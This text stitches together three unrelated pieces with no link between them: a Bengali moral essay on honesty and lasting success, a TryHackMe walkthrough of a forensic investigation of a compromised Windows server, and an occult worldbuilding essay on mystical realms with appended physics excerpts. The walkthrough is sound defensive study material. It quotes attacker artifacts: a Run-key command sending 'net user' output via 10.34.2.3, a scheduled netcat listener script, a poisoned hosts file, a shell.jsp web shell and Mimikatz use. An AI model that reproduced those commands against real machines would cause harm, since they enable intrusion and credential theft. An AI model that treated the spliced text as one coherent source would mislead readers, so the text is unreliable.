⠀⠀ আমরা সাধারণত চোখের সামনে যা দেখি, তাকেই সত্য ধরে নিই। আজ কার লাভ হলো, কে উন্নতি করল, কে ক্ষমতার চেয়ারে বসল -এসব দিয়েই আমরা সফলতা আর ব্যর্থতার বিচার করি। অথচ জীবন এত সরল নয়। জীবনের হিসাব অনেক গভীর, অনেক বিস্তৃত। এখানে সময়ের সাথে সাথে জীবনের সমীকরণ বদলায়, আরও বদলে যায় সফলতার সংজ্ঞা।

একদিন তাড়াহুড়ো করে বাসে উঠতে গিয়ে বাদামের ঝুড়ি হাতে রফিক মিয়া হোঁচট খেয়ে পড়ে গেল। ঠিক সেই মুহূর্তে ট্র্যাফিক ছেড়ে দেওয়ায় কয়েকটি গাড়ির চাকার নিচে পিষ্ট হলো তার সারা দিনের পুঁজি -বাদামের ঝুড়ি। মুহূর্তেই শেষ হয়ে গেল তার রুজি-রুটি। অসহায় মুখ নিয়ে দাঁড়িয়ে রইল সে।

অন্যদিকে একই রুটে বাদাম বিক্রি করা শফিক মিয়ার সেদিন দারুণ লাভ হলো। রফিক না থাকায় দ্বিগুণ বিক্রি করল সে। হাতে এলো ভালো অঙ্কের টাকা। আপাতদৃষ্টিতে ঐদিনের জন্য শফিক হলো সফল, আর রফিক হলো ব্যর্থ, নিঃস্ব একজন। কিন্তু সন্ধ্যায় সারা দিনের আয় নিয়ে শফিক বসে গেল জুয়ার আসরে। রাত শেষ হতেই উপার্জিত সব টাকা হারিয়ে সেও শূন্যে নেমে এলো। সকালে দেখা গেল- রফিক আর শফিক দুজনকেই আবার শূন্য শুরু করতে হবে। তবে পার্থক্য এক জায়গায়।

রফিক মিয়া ছিল সৎ, ভদ্র ও পরিশ্রমী মানুষ। সবাই তাকে বিশ্বাস করত। তাই সে যখন নতুন করে ব্যাবসা শুরু করতে চাইল, তখন মানুষ বিনা দ্বিধায় তাকে বাকীতে মাল দিল। মানুষের বিশ্বাসই হয়ে উঠল তার নতুন মূলধন। অন্যদিকে শফিকের জুয়ার নেশা আর অবিশ্বস্ততা কথা সবাই জানত। তাই কেউ তাকে বাকীতে মাল দিতে চাইল না। বিশ্বাসহীন মানুষের জন্য পৃথিবীর কোনো দরজাই কখনো খোলা থাকে না।

⠀⠀ এবার চলুন আরেকটি গল্প শুনি। গল্পটা সুমন নামের এক অফিসের সহকারী ম্যানেজারের। সারাদিন বসকে তোষামোদ করে সময় কাটাত, আবার আড়ালে তারই বদনাম করে বেড়াত। তবে তার একটা সুপ্ত ও গোপন ইচ্ছা ছিল। ইচ্ছেটি ছিল- কবে বসের চাকরি যাবে আর সে সেই চেয়ারে বসবে। অনেক দিন পর তার সেই চাওয়া পূরণ হলো। তার বস চাকরি ছেড়ে চলে গেল, আর সুমন পদোন্নতি পেয়ে হলো ম্যানেজার।

মানুষের চোখে সে সফল। কিন্তু সফলতা আর ইচ্ছে পূরণ তো আর তার চরিত্র বদলাতে পারে না। আগের মতোই চললল তার অফিস পলিটিক্স, ষড়যন্ত্র, স্বজনপ্রীতি আর তোষামোদের রাজনীতি। ফলে বিশ্বস্ত, কর্মঠ ও যোগ্য কর্মচারীরা একে একে চাকরি ছাড়তে লাগল। শূন্য পদে নিয়োগ পেল অদক্ষ, তেলবাজ ও অনভিজ্ঞ লোকজন। আর এসব কারণে কোম্পানির ক্ষতি বাড়তে থাকল। শেষ পর্যন্ত কর্তৃপক্ষ বাধ্য হয়ে সুমন ও তার গড়া পুরো দলকেই ছাঁটাই করলো।

⠀⠀ আরও একটি গল্প শোনা যাক। পরীক্ষায় একজন নকল করে ভালো রেজাল্ট করল, আর অন্যজন সততার সাথে পরিশ্রম করে মাঝারি ফল পেল। সবাই প্রথমজনকে মেধাবী বলল। কিন্তু সময়ের সাথে দেখা গেল- নকলের সাফল্য টেকেনি, আর পরিশ্রমী মানুষটি ধীরে ধীরে জীবনে অনেক দূর এগিয়ে গেছে।

এই গল্পগুলো আমাদের চারপাশে ঘটে চলেছে। গল্প গুলো আমাদের শেখায়- সফলতা একদিনের অর্জন নয়, এটি একটি দীর্ঘ প্রক্রিয়ার ফসল। সাময়িক লাভ, ক্ষমতা কিংবা বাহবা প্রকৃত সাফল্যের পরিচয় নয়। প্রকৃত সাফল্য গড়ে ওঠে সততা, পরিশ্রম, নৈতিকতা, ধৈর্য ও মানবিকতার ওপর ভর করে।

⠀⠀

⠀⠀

জীবনে দ্রুত সফল হওয়ার চেয়ে সঠিক পথে এগোনো বেশি গুরুত্বপূর্ণ।

জীবন এক নিরন্তর প্রবহমান ধারা। এই ধারার সামনে টিকে থাকার জন্যে সততা, পরিশ্রম, ধৈর্য ও নৈতিকতা -এই চারটি স্তম্ভ শক্ত করে গড়তে হবে। আর এই স্তম্ভের ওপর দাঁড়ানো সাফল্যই প্রকৃত সাফল্য। তাই কাউকে সফল বা ব্যর্থ বলার আগে একটু থামা উচিত। কারণ আমরা দেখি ঢেউয়ের তোড়, কিন্তু জানি না স্রোতের গতি। আর এই অদেখা স্রোতের কাছেই তো শেষ কথা বলার অধিকার থাকে।

⠀⠀

⠀⠀

⠀⠀

⠀⠀

This is a Walkthrough for the Investigating Windows Digital Forensics TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.

Introduction

The description of the room is the following:

A windows machine has been hacked, its your job to go investigate this windows machine and find clues to what the hacker might have done.

The room has us running commands and investigating logs after a Windows machine was compromised. To do this we will use the Windows Command Line, the Powershell, the Registry, and the Windows Event Viewer to examine Security Logs. Sysmon was not available for use in this machine.

Task 1: Whats the version and year of the windows machine?

We need to run the following command:

systeminfo

The answer is

Windows Server 2016

Task 2: Which user logged in last?

There are two ways of doing this: checking either Security Logs or using the Powershell. Let's do both.

Powershell

By using the command

Get-LocalUser | Select Name, LastLogon

We will be shown a list with all users and their last logon. We choose the most recent one.

Name LastLogon
---- ---------
Administrator 2/22/2026 9:41:12 PM
DefaultAccount
Guest
Jenny
John 3/2/2019 5:48:32 PM

Security Logs

This is more complex as it requires us to examine Security Logs in the Windows Event Viewer. This machine, however, contains tens of thousands of Security Logs. We can filter them by Event ID 4624, which corresponds to Successful Logon events. In the previous task, we found out that the domain for the machine was EC2AMAZ-I8UHO76, so the account in question's domain has to be this one. We need to find the latest one.

Regardless of method, the answer is:

Administrator

Task 3: When did John log onto the system last?

See the previous task. The answer format: MM/DD/YYYY H:MM:SS AM/PM (the Windows machine already provides dates in this format).

We can also use the Command Line with the following command:

net user John

Answer:

03/02/2019 5:48:32 PM

Task 4: What IP does the system connect to when it first starts?

For this, we have to take a look at the Registry. Specifically, the following key:

HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

This contains a value named UpdateSvc that is running a process:

C:\TMP\p.exe -s \\10.34.2.3 'net user' > C:\TMP\o2.txt

We know this is not normal Windows behavior at all, as it is sending user information to a file created in a directory called “Tmp”. The answer to our task is right there:

10.34.2.3

Task 5: What two accounts had administrative privileges (other than the Administrator user)?

We can find out about this using the Powershell again, by running the following command:

Get-LocalGroupMember -Group "Administrators"

We get the following output:

ObjectClass Name PrincipalSource

---

User EC2AMAZ-I8UHO76\Administrator Local
User EC2AMAZ-I8UHO76\Guest Local
User EC2AMAZ-I8UHO76\Jenny Local

The answer is in the following format: “[...], [...]“, in alphabetical order:

Guest, Jenny

Task 6: Whats the name of the scheduled task that is malicious.

I tried to find it in the Event Viewer by using Event ID 4698 (Scheduled Task Creation), but it returned no result, meaning that it could have been cleared. For this, we need to use Task Scheduler.

We will eventually find a task named “Clean file system”, which definitely sounds like a custom task, and it is run by Administrator at 4:55 PM every day. It runs: C:\TMP\nc.ps1 -l 1348 Judging by the name and the argument, it looks like the Powershell is trying to run a shell listener (most likely netcat).

Answer:

Clean file system

Task 7: What file was the task trying to run daily?

See above Answer:

nc.ps1

Task 8: When did Jenny last logon?

See Task 3. As nothing appears on the “LastLogon” field, it means never. Alternatively, the command “net user Jenny” explicitly says Never.

Answer:

Never

Task 9: At what date did the compromise take place?

This is a tricky one as we do not have an answer by itself, so we need to surmise it by context. If we take a look at Event ID 4732 (Member added to a security group) we will see that the user John was added to Users. This is done automatically when a user is created. By taking a look at the properties regarding the creation of processes, folder creation, scheduled task, and registry values of previous tasks, we can find that all happened on the same day, 03/02/ 2019. We also know that the user Jenny is an administrator, yet this user has never logged in... weird for an administrator to do. When we used the command of Task 8, we found that Jenny's “Password last set” attribute was on 03/02/ 2019. If Jenny's password was last set on that day, and Jenny never logged in, we can presume that's the day the user Jenny was created. These are actually common Persistence techniques used in attacks (MITRE ATT&CK ID T1136 – Create Account and ID T1098 – Account Manipulation)

Answer format: MM/DD/YYYY

03/02/2019

Task 10: During the compromise, at what time did Windows first assign special privileges to a new logon?

Using the Event Viewer, we can filter by Event ID. I first tried using IDs 4720 and 4732, but had no luck. Then I filtered the following: Event ID 4672 (Special Privileges Assigned to new Logon)

We will have to check the details for these, or use the hint TryHackMe provides (it occurs at ?:??:49) The answer is:

03/02/2019 4:04:49 PM

Task 11: What tool was used to get Windows passwords?

On previous tasks, one folder kept coming up: \TMP\. This seems to be the place files relevant for the attack are being kept. The folder contains several files: .tmp, .exe, .ps1, and .txt. Taking a look at the Text files, we find “mim-out.txt”. If we read it, we'll find that we are looking at Mimikatz output. Mimkatz is a credential stealer.

Answer:

Mimikatz

Task 12: What was the attackers external control and command servers IP?

If there is a Control and Command server, we need to check a file that contains the DNS mappings for the machine. This would be the etc\hosts file. On this machine, the file can be found at C:\Windows\System32\drivers\etc. The contents of the file are:

10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
76.32.97.132 google.com
76.32.97.132 www.google.com

**76.32.97.132** does not seem to be the correct IP for google.com. This is most likely DNS poisoning - every time the machine tries to reach google.com, it will be redirected to a fake website posing as google. Answer:

76.32.97.132

Task 13: What was the extension name of the shell uploaded via the servers website?

If we take a look at the directories in the machine, we will find inetpub, which is used by IIS, a web server from Microsoft. Inside we can find the wwwroot folder, which will contain all the server files. We will also find a file named “shell.jsp”.

Answer:

.jsp

Task 14: What was the last port the attacker opened?

Check firewall rules. Latest one is called “Allow outside connection for development”, on Local Port 1337. Answer:

1337

Task 15: Check for DNS poisoning, what site was targeted?

See Task 13, the etc\hosts file. A:

google.com

Congratulations! The room is finished.

Conclusion

This was actually an entertaining room! Unlike other Blue Team rooms I've completed in the past, this one clearly had more of a focus on Post-Incidents activities rather than Prevention or Detection in real-time. I had to learn new Event IDs, learn to keep the etc\hosts file in mind, especially when C2 and DNS Poisoning are suspected, and how to manually investigate a machine, instead of relying on automatic logs.

---

created: 2024-06-23T14:57:42 updated: 2025-07-31T23:43:24 modified: 2026-02-09T07:10:38-06:00

---

Editor's note: the fool thinks himself cartographer charting five dimensional space-time as if a plane could hold its complexity. Nor does he address its propensity for change where blurry borders shift as swiftly as the dunes and just as unpredictably. Still, it may help the layperson understand their place, insubstantial though it may be. – ANV.

Two toruses surrounding a sphere with all of them bleeding into one another, gradually becoming each other.

🜁🜂🜃🜄

---

Our universe, all of reality as we can objectively experience it and study it, is but one level of a greater existence. We occupy a world of three spatial dimensions and one of time. The two are interlinked and influence each other such that we call the whole thing space-time. The only real difference between time and space is that time moves only in a single direction for us. We can slow it down, even stop it, but we cannot reverse it or travel backwards upon its trajectory. This leads to entropy, the fact that everything we know will one day end.

But there are other places that our minds can reach into given the right circumstances. Some of these are what we might call parallel, some are “above” or “below”, but all are in directions that have no names and that cannot be described easily by science. They are mystical places, magickal realms that require altered states to experience.

Intelligence, sapience, self-awareness are the keys to this type of “travel”. Humans have evolved the capacity for it. Perhaps thanks to genetic coding from our forebearers. Perhaps, given time, all intelligence will develop these abilities.

IMAGES MISSING

The Other Way / The Æther / The Astral Plane

Directly on top of what we can see with our eyes is another place with many names. To see in that space is called looking the Other Way by some or seeing auras. When science wasn't as strong as it is today, everyone believed it was there, just invisible. Today, it is left to the realm of magick and psychics, unfortunately.

Most sapient life can peer into this place with practice. Looking the Other Way is also called opening the third eye but, in truth, it is looking at the world from an impossible angle, orthogonally. Our biology is not designed to understand this strange direction so we have developed a series of sensory metaphors accepted into the universal unconsciousness that allows us to interpret it without going mad.

We see auras and visions, we hear music or discord, we smell flowers or filth, we feel tingling or coldness on our skin, we taste sweetness or other things. It is the way we see a deeper truth about the world around us.
The dead leave their imprint on this place and you may find ghosts or spirits. Do not be fooled by them. They are not the people they represent. They are echoes, imprints, memories of them, but they are not truly living things. Given time, they may believe themselves to be who they seem, but it is a self-deception.

Among the ghosts are things that feed on such energy and things that can feed on our lifeforce directly. To feed, they need to be perceived. But only once. If you see them, smell them, taste them, they can touch you in return and, in touching, attach themselves. From that moment forward, you have a parasite that will suckle itself on your dreams, your hopes, your fears, your tears, any strong emotions, though some seem to have preferences. To remove them, you have to see them once again which, of course, opens you up to more attacks.

There are even fully sapient beings that appear to be native to this place, taking innumerable shapes and having their own drives and desires. They may choose to reach out to us as friends or as predators, but mostly they ignore us as not worth the effort.

There are some humans who can leave their bodies behind, but tethered, and send their essence far out into the Other Way, discovering those temples and cities, graveyards and ruins of all civilizations that came before and where the old gods once resided. The silver cord connecting the wandering soul to the body is thin, nearly invisible, but it is strong as spider silk spun from steel. Strong, but not impervious to damage. If the cord is broken, the traveler must find their own way home. If they have gone far enough, this may be impossible, leaving their body without a force to drive it, sleeping dreamlessly, autonomously breathing, digesting, living, but not truly alive. When the body eventually dies, the spirit will feel its loss and it, too, will fade.

The other possibility is you may return to find that your body is no longer yours at all. While absent your body, some opportunistic being may slither inside the hole you left behind. You will become “indwelt” by something that noticed your absence. They will have your body and your mind, more than enough to be you and take over your life. The only thing missing is your soul which, with the loss of the body, will likely fade or be devoured. “You” will cease to be while the thing wearing your skin and remembering your memories is free to experience the physical world for the rest of your lifetime.

Looking the Other Way is difficult and dangerous. For most, it is just a “feeling” or a “knowing” that comes at certain times, nothing as dramatic as auras or ghosts. And, if you have these extra senses? Embrace them, enjoy them, use them, but do not choose to venture further afield unless you are willing to accept the risks.

The Dreaming

The Dreaming is easy to reach. Just go to sleep for 90 minutes or so and your brain reaches out to it automatically. It's the little melting pot of the collective unconscious, where we go to sort through our memories and feelings and give our brains little bit of a workout for the night. It's exercise for your subconscious. It's healthy and natural to be here and everybody does it.

The Dreaming is not designed to be a place that builds memories. Your brain goes out of its way to make the conscious mind forget what it experiences. It is only through luck or practice that we may begin to remember our dreams in detail. And that is the first step to going deeper.

The Dreamlands

The Dreamlands are a little bit deeper. You have to reach the Dreaming first, before you can reach the Dreamlands. You have to find the way. Sometimes, you fall into the Dreamlands by mistake and experience the most amazing, life-changing dreams you've ever felt. Realer than real. Colors with no names, indescribable music, flying and swimming, life affirming, impossible to forget.

But, typically, you have to find your way to the Dreamlands. You have to understand first that you are dreaming, which is more difficult than it sounds. Your brain tries very hard to convince you that your dreams are reality while you are in them because your brain has an agenda. Your brain wants you to learn something or see something and if you realize you are dreaming, you can derail that plan.

If you know you are dreaming, if you are Dreaming, you can push back, gently at first. Learn the rules. Make a few additions.

The next trick is to remember your previous Dreams when you are Dreaming. Remember what you learned last time. Don't be flashy; don't draw attention to it. Just remember. Remember how you could stand on your tip toes and then lift your toes and float in place? See if you can still do that. Remember how you could push your hand through a window like the glass was made of putty? Try that again. Could you breathe underwater? There's a swimming pool, see if you still can. Just for a moment. Just for a second. Not enough to take away from the narrative.

When you remember enough tricks, you can finally find the Dreamlands, the real Dreaming for real Dreamers.
It's like Plato's Cave. You've been Dreaming at the shadows on the wall. Now you get to turn around.

Your brain may try to hold you in place, force you to turn back to the cave wall. It will try to convince you that it still has so much to teach you, that you are safer in the cave. You are, of course, but where's the fun in that?
The Dreamlands is populated by creatures of fantasy and horror, with cities ancient and futuristic, all borne of the Dreaming minds of humanity over the centuries. The Dreamlands are an everchanging place, but they only change at the whim of Dreamers. Dreamers can be as gods here. And if you search far and wide, you will find other gods, even gods whose names you've heard from mythology. In the Dreamlands you can build empires and destroy them, visit the center of the earth or the surface of Mars, talk to shadows, shrink down to an inch and befriend insects, expand to colossal size and have a heart-to-heart with a kaiju. Create whatever you can imagine. The human-like denizens of the Dreamlands revere Dreamers above all else.

The biggest risk of the Dreamlands is that you are no longer alone. Other Dreamers visit the Dreamlands and have their own ideas. The Dreamlands are big enough for everyone but there are some who seek out others to antagonize. Perhaps they get bored. Perhaps they are worried that too many people may find the Dreamlands and they will no longer have their little corner.

It is said that when a Dreamer who frequently traverses the Dreamlands dies, their mind finds itself back there, forever. I have no evidence or experience to back this up one way or another as the Dreamlands are far too large to fully explore.

The Fugue

The Fugue is a strange half-existing place, between slumber, dreaming, and wakefulness. It's often called “sleep paralysis” or “night terrors” but it is more than that. When the body is caught just so between dreaming and being fully awake, you can perceive a place that vibrates at a slightly different frequency. It's such a narrow band that it's easy to miss, but it is full of intelligent life. By appearances, they are creatures of nightmare or denizens of hell, but that is just how they look.

In fact, the residents of the Fugue crave human companionship and it is their overeagerness that led to legends of demons sitting on chests or stealing the life from babies. The Fugue is a cold place and the warmth of mankind is dearly sought after and fought over. But it is only in those moments between when we may see each other properly. And it is not easy to stay when you are on the way in or out.

I suppose we all must pass through the Fugue on the way to the Dreaming and back, but we pass so quickly that we scarcely notice.

For those who understand the Fugue, you can make easy friends with the things living there. Faceless, eyeless, skinless terrors by appearance but kind and friendly if you give them a chance. Some love to chat about our world and get their sustenance by the exchange of ideas. Others find physical contact more directly expedient and will eagerly mount and copulate with anyone who assumes the position, whether on purpose or not. This has led to their negative reputation, but, honestly, it's just how they eat and they have to eat.

Those natives that become truly forgotten sink down into shadow, into the Gloam, to be repurposed.

Those that receive enough love may be elevated to Epicurea and become harbingers of daydreams or sudden insights.

The Fugue is also one way to reach Nuntius, the Realm of Knowledge where the Akashic Records and the Library of Babel can be found. You must pass through Nightmare, Regret, and Longing to reach it from this path and most never find their way through.

Effervescence

Between us and The Gleam.

Realm of meaningless delight.

Insight and questing to the right.

Resignation and acceptance to the left.

Perhaps this is the home of the Fae. The Seelie.

Effluvia

Between us and The Gloam.

Realm of decay.

The Unseelie.

The Gloam

Umbra

The Void

The Gutter

The Gloaming

To reach the Gloam without drugs or heavy meditation is not impossible, but is very unlikely. The Gloam is no-man's land between us and oblivion. The Gloam is a gutter, a shadow of this world. Most people seek to avoid it, pass around it, or through it so quickly that it doesn't matter. Mirror walkers can avoid it, shadow walkers make frequent use of it. Vermin from this world and the Dreaming frequently cross over into the Gloam because it is easy to find food there. It is a place where, unlike the Fugue, our warmth is despised and hated. As such, tiny creatures wandering in to eat and dispose of those bits of us that remain is seen as a benefit, doubly so because their presence unnerves us. Spiders, rats, roaches, snakes, flies, maggots, all of them have negative connotations to most humans. To see them in the dark places just adds to our fear and the things that live in the Gloam feed on fear and despair.

They are called Shadow Things, Shadow People, Shadow Men, a thousand other names. They are sought out by some because they know everything. They know everything because shadows are everywhere and they are always listening.

They know everything and they do not lie. They could lie if they wanted to, but telling the truth generally hurts us more than lying to us, so they tell the truth. And that is the crux of their existence: oracles of truth of the most unfortunate kind, things you'd rather not know. Things you can never forget once told.
You don't have to visit the Gloam to find the Shadows. You can reach out to them in many ways. But offering blood, yours or someone else's is the easiest way. They love it when we spill blood. They love it when we are afraid.

And, remember, they are always listening.

Always.

—

The Gloam is also the home of Naralmtu, the God of Shadows. It is not something to be invoked on a whim and most who know of it never speak its name or write down a word about it. To know it is to be known by it and when the shadows take special interest in you, your life will be filled with cold despair, disappointment, hardship, and loss. There are those that worship it, however. The feed it the lifeblood of sacrificial humans and animals. They feed it their own blood. In exchange for knowledge, in exchange for turning the shadows against their enemies. Some followers know they are being used and drained just as surely as their victims, but they do not care. Temporary power over their finite lifetimes is reward enough for these empty souls.

I know a great deal more about this entity, but to write it down is to further imperil myself.

The Gleam

The Blazing World

Hyperspace

The Gleaming

If you have heard of the “machine elves” then you have heard of the Gleam. Without drugs or a strong will and careful magick, this realm is impossible to comprehend. It is as far as our human minds can reach, to go further is to find nothing that can be described or understood. Do not take that as a challenge. Our bodies, our flesh is simply not capable of experiencing that many special dimensions. To put it another way, there are some directions in which we are unable to see. What would “up” mean to a stick figure living on a piece of paper? It is the same for us. The Gleam is the edge of this space. To our minds, it seems to extend forever in all directions, in colors without names, endlessly folding and unfolding itself, rejuvenating and decaying, being born and dying over and over. That is how our brains interpret the edge of 4 dimensional space-time when we try to peer beyond.

From there, if you can properly direct yourself, you can see the past or the future, you can see what might have been or what could never be. You can relive your favorite moment for eternity in just a few moments.
The machine elves hang out on this barrier to greet travelers. It is in their nature to be jovial and helpful, but also chimeric and mischievous. They appear to us to be made of crystalline lattices shaped into insect-like bodies. Just like their entire realm, they are constantly folding and unfolding, becoming and unbecoming. They can, if they wish, project forms more suited to our senses and sometimes they may. Also, while their native language is one of thought pictures, impressions, and feeling, they can translate their ideas into our speech, though something is lost in the translation and it often sounds like they are talking over themselves, trying to mix various meanings together. Imagine the same conversation in each of your ears but with slightly different wording and at a slightly different pace. Now imagine that times a hundred.

The Gleam is a place of possibilities. That is why most of us seek it. You can see what we can be if we make the best choices and it may inspire you to be a better person. That's what the machine elves want. They want us to be the best versions of ourselves.

A single trip to the Gleam can turn anxiety into ecstasy and depression into hope.

—

A secret about the machine elves that most do not know. They are not the highest lifeforms in their plan of existence. In fact, they are barely more than what we would call bacteria or simple multicellular life. But such is the differences in our levels of reality that even the lowest among them is godlike by comparison. It's also why they are interested in us. We are a sapient species reaching out and we treat them with a level of awe and respect that they cannot find in their own world alone.

They line the “shore” of the “ocean” we swim up through, looking for lights to rescue. When we peak through, they surround us and so we are enlightened.

To meet a higher lifeform from their plane would likely be disastrous to a human mind, like gazing into infinity or a naked singularity.

The Gloam is about inevitably.

The Gleam is about possibility.

Ur

When the nothing became something, yet still before the first vibration, before the first waveform, before the first Planck length had been crossed, there was Ur, The First Place, the Ocean of Creation.

It is just as much a furnace, boiling and churning raw possibilities, recombining them into new things while simultaneously devouring and recycling the old with no care as to which. It has no guiding consciousness, no blueprints or plans, no thoughts of its own to speak of.

It is chance.

It is random.

But it is also eternal.

Given time, moments of apparent order can arise out of chaos. If they are quick and lucky, some few of these moments break free, find the surface, crawl away, and seep into other realms. It is from those stolen remnants that everything we know to exist arose.

The borders of Ur are filled with rotting carcasses of failed escapees and the trails, some wide and ragged, some so small as to be invisible, from those that made it. Be wary of stragglers or new arrivals who, eager for energy or ignorant of their strength, may seek you out and do you harm.

Under no circumstances should any living thing deign to enter Ur itself. It's driving nuclear engine would rip apart anyone or anything foolish enough to slip under its surface faster than the speed of light.

It is said that certain creatures, those acquainted with chaos, know ways to traverse the waters safely, but they are known to traffic in lies and half-truths. To put your faith in anything they offer in regards to Ur is more suicidal than simply foolish.

Why would anyone seek out such a place?

Change is seductive, to be someone else, to be better.

Perhaps you are terminally ill.

Perhaps you are hopeless.

Perhaps you are stuck, broken, lonely, inadequate, afraid, incomplete.

Would you be willing to throw your life into a blender and pray you retain your “self” in the recombination?

Would you be so unsatisfied with your current life that you are willing to risk complete dissolution?

Or perhaps.

Perhaps.

You prefer to be undone.

There are those who have been so traumatized by the act of living in the world as it is that they wish to escape into emptiness and leave nothing behind. They do not care for legacies. They do not see “the future” as anything but a continual slide into pain, isolation, and loneliness. They see the truth: entropy is inevitable.

But instead of seeking strength or fellowship, they choose to forget and to be forgotten.

What they do not understand is that Ur is rebirth. They will cease, but every bit of everything that made them who they were will be repurposed and reused to make another or billions of others stretched and threaded until unrecognizable.

True endings are only available from embracing Oblivion, from the orthogonal path back to the beginning, back to the ending. Only there can everything be truly nothing, forever and ever.

—

Nessianna Inmenna operates out of Ur. To her, the radioactive waters are like a warm bath, a comfort.

Elysium / Nirvana

Imagine a party that never ends spanning worlds filled with abundant life. That is Elysium, also called Nirvana.
A “party” is something with a different definition for each culture. For some it is a celebration of excess. For others, it may be an acknowledgement that you finally understand that you have no desires at all. For both, it is a place without responsibilities.

Elysium is a paradise of wanting and needing nothing, whether this is because everything is provided that you could possibly want or a place of emptiness because all worldly concerns have vanished, you will find it here and you will be at peace.

Epicurea

Epicurea is another world of plenty, but it does not give those who visit anything for free. You must work to find what you desire, but it is here. It is always here and you may find it if you pass the tests, survive the gauntlets, answer the riddles. It is a plane of growth and perseverance.

Unlike Elysium, here, you can fail. You may not solve the puzzles on the first try. You may not find your way through the maze. But you can try again.

Hell

Hell is not a place intended for punishment, not directly. Hell is a place for refinement and growth. Some who find themselves here may never realize that and they may be “tortured” for eternity. Others may thrive, find themselves, rarified, and leave freely as something greater than what arrived.

Hell is not a single place or a single experience. It is something that builds itself around the expectations of its inhabitants. Many may share the same Hell or Hells, but that is a quirk of organized religion planting the same set of expectations in the minds of billions.

Nuntius

Nuntius is a realm of secrets, of knowledge, of every book that could ever be written. It is also a plane full of lies and deception so the traveler must be cautious and careful.

One can find the Akashic Record here, but there is no helpful librarian, no card catalog or directory, and any one book is just as likely to be a fake as to be genuine. Additionally, a single wrong step and you may find yourself in the The Library of Babel instead and that path is guaranteed madness.

Vitrium

Imagine a world where every tree, every insect, every blade of grass, every gust of air is broadcasting every detail of itself to every other thing, all the time. It is a world of perfect, unfiltered information; a place where there are no secrets.

To visit Vitrium is to be laid bare to yourself and everyone else. There are no shadow selves here, no lies or deception, only Truth.

For a human mind, the raw experience of such a place is a meaningless cacophony, too wide, too deep, too bright, too loud. It is impossible to process.

Acceptance / Obsequium

Obedience, Submission, Compliance, Resignation

Concerned with how

Science, Religion, Rules, anything with codified and definitive answers, anything that replaces warm hope with cold truth.

Passive while appearing Active.

Insight / Consilium

Insight, Discernment, Understanding

Concerned with why

Introspection, Mindfulness, experience over explanation, seeing and being over knowing.

Active while appearing Passive.

Addendum 1: Oblivion

The Blight

Singularity

Nowhere

Nowhen

Absolute Zero

Before existence, there was Oblivion. Eternal because time had not yet ticked its first. Limitless because space had not yet been borne. It was nothing and everything. Potential without ignition, less than the sum of its parts. It is absolute entropy and the state to which every universe seeks to return.

Naralmtu serve The Blight.

Absolute Zero

https://en.wikipedia.org/wiki/Absolute_zero Absolute zero is the lowest possible temperature, a state at which a system's internal energy, and in ideal cases entropy, reach their minimum values. The Kelvin scale is defined so that absolute zero is 0 K, equivalent to −273.15 °C on the Celsius scale,[1][2] and −459.67 °F on the Fahrenheit scale.[3] The Kelvin and Rankine temperature scales set their zero points at absolute zero by design. This limit can be estimated by extrapolating the ideal gas law to the temperature at which the volume or pressure of a classical gas becomes zero.

At absolute zero, there is no thermal motion. However, due to quantum effects, the particles still exhibit minimal motion mandated by the Heisenberg uncertainty principle and, for a system of fermions, the Pauli exclusion principle. Even if absolute zero could be achieved, this residual quantum motion would persist.

Although absolute zero can be approached, it cannot be reached. Some isentropic processes, such as adiabatic expansion, can lower the system's temperature without relying on a colder medium. Nevertheless, the third law of thermodynamics implies that no physical process can reach absolute zero in a finite number of steps. As a system nears this limit, further reductions in temperature become increasingly difficult, regardless of the cooling method used. In the 21st century, scientists have achieved temperatures below 100 picokelvin (pK). At low temperatures, matter displays exotic quantum phenomena such as superconductivity, superfluidity, and Bose–Einstein condensation.

Addendum 2: Rapture

The Bloom

The Song

Ecstasy

Exultation

Ubiquity

Omnilarity

Everywhere

Everywhen

Quantum Foam

Everything that can exist, does exist here. Everything that cannot exist, exists here. Everything that was and was not, what will be and will not be, exists here. This is all things, all times, all places, all thoughts, all possibilities and impossibilities.

This is the first moment, before any rules have been established, before up is up and down is down.

Ohmadrundi (a subset of machine elves) serve The Bloom.

IMAGE MISSING

Absolute Hot (Planck Temperature)

[[What Is The Hottest Temperature in The Known Universe, And Could We Achieve It]] https://www.straightdope.com/21341968/what-is-the-opposite-of-absolute-zero There is a limit, sort of, but it’s so inconceivably large that nobody but high energy physicists talks about it (although as I think about it absolute zero doesn’t exactly qualify as breakfast table chatter either). The highest possible temperature, called the Planck temperature, is equal to 10³² degrees Kelvin. For comparison, the center of the sun bubbles along at 15 million K (15 x 10⁶); silicon can be created by fusion at 1 billion K (10⁹). In short, the Planck temperature is very toasty indeed.

Some scientists believe that we, or at least our universe, have already experienced the Planck temperature, although it went by so quickly you may have missed it. It occurred at 10 ^-43 of a second after the Big Bang, the great cataclysm in which the universe was born. (10 ^-43 of a second, in case you’re not hip to the notation, is an incredibly tiny fraction of time. Time enough to create the universe, but not, as a University of Chicago physicist was once at pains to explain, time enough to get off a disputed last-tenth-of-a-second shot against the Chicago Bulls.)

Absolute zero is easier to understand than the Planck temperature. What we perceive as heat is a function of motion. The colder something gets, the less internal motion or vibration its molecules exhibit. At absolute zero — that is, zero Kelvin or -460° Fahrenheit — molecular motion virtually stops. At that point whatever the molecules are a part of is as cold as it’s going to get.

There’s a lot more latitude in the opposite direction. The faster molecules move, the hotter they get. At 10¹⁰ K electrons approach the speed of light, but they also become more massive, so their temperature can continue to rise. At 10³² K such staggering densities obtain that greater temperature would cause each particle of matter to become its own black hole, and the usual understanding of space and time would collapse. Ergo, the Planck temperature is as hot as things can get. Or at least it’s the highest temp conceivable in present theory. There’s a chance when a quantum theory of gravity is worked out we may find even higher temperatures are possible. The prospect, frankly, leaves me cold.

Addendum 3: The Mirror Realm

Also called “Ouroboros”

Chirality is not a word you are likely to hear in every day conversation, but it is at the heart of the final place we must consider: The Mirror Realm.

To understand the idea simply, look at your hands. Despite the fact that they seem functionally identical at first glance, there is no direction or method by which your left hand could be held or manipulated into being your right hand.

